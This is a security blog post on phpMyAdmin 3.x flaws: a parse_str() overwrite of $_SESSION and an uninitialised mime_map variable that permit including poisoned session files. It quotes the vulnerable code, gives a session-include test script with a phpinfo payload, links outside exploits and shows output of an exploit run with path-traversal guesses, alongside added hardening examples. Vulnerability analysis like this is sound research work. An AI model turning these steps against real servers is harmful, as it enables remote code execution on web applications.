phpMyAdmin 3.x Vulnerabilities

Source: Internet
Author: User
Tags: php, session

5up3rh3i's blog

Let's take a look at the advisory "phpMyAdmin 3.x Multiple Remote Code Executions" published by researchers abroad. Four vulnerabilities are described in it, but the key one is the first: overwriting the $_SESSION variable through parse_str(). The third vulnerability is the exploitation that builds on that $_SESSION overwrite. Here I want to praise the awareness of both the discoverers and the official phpMyAdmin team, because they also acknowledged the other three issues and provided a fix for each; for details see PMASA-2011-8/7/6/5. These are the "secondary attack vulnerabilities" I have mentioned many times in my blog and articles, and the fixes follow the principle I keep repeating: "every variable entering a function is harmful", "defending at the moment just before entering the function is king"...

Let's look at the cause of the vulnerability and how it is exploited:

File: libraries/auth/swekey.auth.lib.php

if (strstr($_SERVER['QUERY_STRING'], 'session_to_unset') != false)
{
    // registers every query-string key as a variable in the current (file) scope
    parse_str($_SERVER['QUERY_STRING']);
    // writes the current $_SESSION, whatever it now contains, to the session file
    session_write_close();
    session_id($session_to_unset);
    session_start();
    $_SESSION = array();
    session_write_close();
    session_destroy();
    exit;
}

parse_str($_SERVER['QUERY_STRING']) is the variable-overwrite problem we should all be familiar with; it is covered in "Advanced PHP Application Vulnerability Review Technology". As for what happens once $_SESSION has been overwritten through parse_str(), my understanding of PHP's $_SESSION behaviour was still vague at the time, and I was also short of time during the phpMyAdmin vulnerability submission process. Based on previous experience, I set session.auto_start = 1 in php.ini, and the vulnerability triggered successfully. This is why the exploit published by wofeiwo requires "session.auto_start = 1 in php.ini". However, I still did not know why session.auto_start was required. Later, after wofeiwo explained it, I figured it out:

<?php
// sess_1.php
// value written before session_start(): survives only if a session is already open
$_SESSION['abcde'] = "aaaa";
session_start();
var_dump($_SESSION);
?>

<?php
// sess_2.php
// same thing with an explicit first session_start(): the second call is ignored
session_start();
$_SESSION['abcde'] = "aaaa";
session_start();
var_dump($_SESSION);
?>

With session.auto_start = 1, PHP automatically performs a session_start() before the script runs. Therefore, when sess_1.php is requested directly, session.auto_start = 1 is required for $_SESSION['abcde'] = "aaaa" to survive the explicit session_start(). Back to phpMyAdmin: as long as a session_start() has already been executed before libraries/auth/swekey.auth.lib.php is required, the requirement is met, and exactly such a session_start() is found in libraries/session.inc.php:

if (! isset($_COOKIE[$session_name])) {
    // on first start of session we check for errors
    // f.e. session dir cannot be accessed - session file not created
    $orig_error_count = $GLOBALS['error_handler']->countErrors();
    $r = session_start();
    if ($r != true || $orig_error_count != $GLOBALS['error_handler']->countErrors()) {
        setcookie($session_name, '', 1);
        PMA_fatalError('strSessionStartupErrorGeneral');
    }
    unset($orig_error_count);
} else {
    @session_start(); // here
}
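As an added example (not from the original post or from phpMyAdmin), the following script reproduces the two facts this section relies on and shows the hardened form of the call. The query string is constructed, and the session-id pattern used in the check is an assumption.

```php
<?php
// Added example, not phpMyAdmin code. It reproduces the two facts behind the
// bug above: (1) one-argument parse_str() at file scope registers query keys as
// globals, $_SESSION included; (2) the overwrite only survives if a session is
// already open, because a fresh session_start() reloads $_SESSION from storage.
// The one-argument parse_str() is deprecated in PHP 7.2 and removed in PHP 8.0,
// so the vulnerable half needs PHP 5.x. The constructed query string below
// stands in for $_SERVER['QUERY_STRING'].

$query = 'session_to_unset=deadbeef&_SESSION[tmp_user_values][hide_transformation]=1';

// Case 1: no session open yet (sess_1.php without session.auto_start).
parse_str($query);                                   // creates a plain $_SESSION array
session_start();                                     // replaces it with stored data
var_dump(isset($_SESSION['tmp_user_values']));       // bool(false): overwrite lost

// Case 2: session already open, as after session.inc.php (or auto_start = 1).
parse_str($query);                                   // adds the key to the live array
@session_start();                                    // "already started - ignoring"
var_dump(isset($_SESSION['tmp_user_values']));       // bool(true): overwrite persists
// A following session_write_close() would now save this array into the caller's
// own sess_<id> file, which is exactly what the swekey code does next.

// Hardened form: parse into an array and accept only the single expected key.
// The id pattern (PHP's session.hash_bits_per_character alphabet) is an assumption.
parse_str($query, $params);
$session_to_unset = isset($params['session_to_unset']) ? $params['session_to_unset'] : '';
if (!preg_match('/^[A-Za-z0-9,-]{1,128}$/', $session_to_unset)) {
    exit("refusing malformed session id\n");
}
// $_SESSION, $GLOBALS and every other variable are untouched by this form.
echo "would unset session $session_to_unset\n";
```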

Then the file can be pulled in through the home page; the specific file-inclusion path will not be analysed here. At this point the author also published his exp: "phpMyAdmin 3.x Swekey Remote Code Injection Exploit". However, after testing you will find that the success rate of this exp is not high, and it also depends on the config directory. This is because the payload in the author's exp is mangled by magic quotes, which is why oldjun's exp exists.

The above exp is based on the "second vulnerability" in the advisory. Later, the author also gave his exp for the "third vulnerability": fail!

It is also worth mentioning that the Russian M4g found a new exploitation point by combining this with a vulnerability found by se (Stefan Esser): http://snipper.ru/view/103/phpmyadmin-33102-3431-session-serializer-arbitrary-php-code-execution-exploit/

It uses MOPS-2010-060: PHP Session Serializer Session Data Injection Vulnerability. The reason it is needed is that PMA_Config in the phpMyAdmin session is an object, which cannot be overwritten directly by submitting variables. If you are interested, test it yourself.

Finally, the "fourth vulnerability" in the advisory had no exp, so I kept working on one, and in the end found that it is the most "valuable" one for penetration testing! The key code is:

File: libraries/display_tbl.lib.php
Lines: 707-710

if ($GLOBALS['cfgRelation']['commwork'] && $GLOBALS['cfgRelation']['mimework']
    && $GLOBALS['cfg']['BrowseMIME'] && ! $_SESSION['tmp_user_values']['hide_transformation']) {
    require_once './libraries/transformations.lib.php';
    $GLOBALS['mime_map'] = PMA_getMIME($db, $table);
}

A typical "variable initialised only under a condition" problem: when the if condition is not met, $GLOBALS['mime_map'] is never assigned, that is, the variable is not initialised!! For the exp I used the Russians' method of including the session file; brute-forcing the session directory works, but what hurts is that PHP will not let you include the session file of the current session. Test code:
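An added illustration, not phpMyAdmin's code: the conditional-assignment pattern above next to its fix, with PMA_getMIME() replaced by a stand-in and the request state constructed by hand.

```php
<?php
// Added example, not phpMyAdmin code. Models the display_tbl.lib.php pattern:
// $GLOBALS['mime_map'] is assigned only inside an if, so when the condition is
// false the caller inherits whatever that global already holds. After a
// variable overwrite earlier in the request, "already holds" means request data.
// PMA_getMIME() here is a stand-in for the real lookup.

function PMA_getMIME($db, $table)
{
    // stand-in: one column with a legitimate transformation entry
    return array('col1' => array('transformation' => 'text_plain__substr.inc.php'));
}

function browse_mime_enabled()
{
    return !empty($GLOBALS['cfg']['BrowseMIME'])
        && empty($_SESSION['tmp_user_values']['hide_transformation']);
}

// Vulnerable: the only assignment sits on one branch of the if.
function load_mime_map_vulnerable($db, $table)
{
    if (browse_mime_enabled()) {
        $GLOBALS['mime_map'] = PMA_getMIME($db, $table);
    }
    return $GLOBALS['mime_map'];
}

// Fixed: initialise unconditionally first, so the false branch yields an empty
// map and never a value that arrived with the request.
function load_mime_map_fixed($db, $table)
{
    $GLOBALS['mime_map'] = array();
    if (browse_mime_enabled()) {
        $GLOBALS['mime_map'] = PMA_getMIME($db, $table);
    }
    return $GLOBALS['mime_map'];
}

// Constructed request state: transformations hidden via the session flag, and a
// mime_map global that was set before this code ran rather than by PMA_getMIME().
$GLOBALS['cfg']['BrowseMIME'] = true;
$_SESSION['tmp_user_values']['hide_transformation'] = 1;
$GLOBALS['mime_map'] = array('col1' => array('transformation' => 'INJECTED'));

$vuln = load_mime_map_vulnerable('db', 't');
var_dump($vuln['col1']['transformation']);   // string(8) "INJECTED": inherited value
var_dump(load_mime_map_fixed('db', 't'));    // array(0) {}: nothing to include
```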

<?php
$sesspath = "/tmp/";
session_start();
$_SESSION['abcde'] = "<?php phpinfo(); ?>";
// the file being included is the current request's own session file
include($sesspath . "sess_" . session_id());
?>

Finally, here is the exploit in action:

root@ubuntu:/home/heige# php ./phpmyadmin_include_poc.php -h http://192.168.0.10/phpMyAdmin -u root -p -d mysql
# Pma3exp-phpMyAdmin3 local include exploit
# By 80vul
# Codz base on http://www.xxor.se/uploads/phpmyadmin_preg_replace_rce_poc.php
# Reference: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html


[I] Running...
[*] Contacting server to authenticate.
[I] Cookie: pma_mcrypt_iv=O8GeDrSMyp4%3D; phpMyAdmin=Shenzhen; pmaUser-1=Zo1Pp49vdR0%3D; pmaPass-1=ggEX%2BxDMg3A%3D
[I] Token: 1db063c5b08202ea26057a6cf3e82a5d
[I] Session: 8e295790f223d07054aab13c7fc87ac66291_c7
[*] Please set args -s 8e295790f223d07054aab13c7fc87ac66291_c7 and try again
[*] Contacting server to poison some _SESSION variables.
root@ubuntu:/home/heige# php ./phpmyadmin_include_poc.php -h http://192.168.0.10/phpMyAdmin -u root -p -d mysql -s 8e295790f223d07054aab13c7fc87ac66291_c7
[I] Running...
[*] Contacting server to authenticate.
[I] Cookie: pma_mcrypt_iv=MSiItAKLpTs%3D; phpMyAdmin=large; pmaUser-1=wlbi7hEJiGE%3D; pmaPass-1=XypvwpApS5k%3D
[I] Token: 4ca3b4ca2bc3cf6c779425493366c181
[I] Session: d1e429fe86d129be587056a09d1f44b56a48e859
[*] Contacting server to poison some _SESSION variables.
[-] ../../../../../../../../../../../../../../../../tmp/sess_8e295790f223d07054aab13c7fc87ac66291_c7 - bad path
[-] ../../../../../../../../../../../../../../../../temp/sess_8e295790f223d07054aab13c7fc87ac66291_c7 - bad path
[-] ../../../../../../../../../../../../../../../../var/tmp/sess_8e295790f223d07054aab13c7fc87ac66291_c7 - bad path
[-] ../../../../../../../../../../../../../../../../var/lib/php/sess_8e295790f223d07054aab13c7fc87ac66291_c7 - bad path
[-] ../../../../../../../../../../../../../../../../var/lib/php4/sess_8e295790f223d07054aab13c7fc87ac66291_c7 - bad path
[-] ../../../../../../../../../../../../../../../../var/lib/php5/sess_8e295790f223d07054aab13c7fc87ac66291_c7 - bad path
[-] ../../../../../../../../../../../../../../../../var/lib/php/session/sess_8e295790f223d07054aab13c7fc87ac66291_c7 - bad path
[-] ../../../../../../../../../../../../../../../../var/lib/php4/session/sess_8e295790f223d07054aab13c7fc87ac66291_c7 - bad path
[-] ../../../../../../../../../../../../../../../../var/lib/php5/session/sess_8e295790f223d07054aab13c7fc87ac66291_c7 - bad path
[-] ../../../../../../../../../../../../../../../../shared/sessionssess_8e295790f223d07054aab13c7fc87ac66291_c7 - bad path
[-] ../../../../../../../../../../../../../../../../var/php_sessions/sess_8e295790f223d07054aab13c7fc87ac66291_c7 - bad path
[-] ../../../../../../../../../../../../../../../../var/sessions/sess_8e295790f223d07054aab13c7fc87ac66291_c7 - bad path
[-] ../../../../../../../../../../../../../../../../tmp/php_sessions/sess_8e295790f223d07054aab13c7fc87ac66291_c7 - bad path
[-] ../../../../../../../../../../../../../../../../tmp/sessions/sess_8e295790f223d07054aab13c7fc87ac66291_c7 - bad path
[-] ../../../../../../../../../../../../../../../../tmp/sess_8e295790f223d07054aab13c7fc87ac66291_c7 - bad path
[-] ../tmp/sess_8e295790f223d07054aab13c7fc87ac66291_c7 - bad path
[-] .../../tmp/sess_8e295790f223d07054aab13c7fc87ac66291_c7 - bad path
[+] .../tmp/sess_8e295790f223d07054aab13c7fc87ac66291_c7 - good path
[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!

The story seemed to be over at this point, but not long afterwards PMASA-2011-12 appeared: the same foreigner, the same file, the same parse_str($_SERVER['QUERY_STRING']); a "similar vulnerability"! I may come back to this in later articles, but note that in PMASA-2011-12 the preconditions for even reaching the parse_str($_SERVER['QUERY_STRING']) code location are very demanding! If you are interested, analyse it yourself :)

Finally, thanks to all my friends!
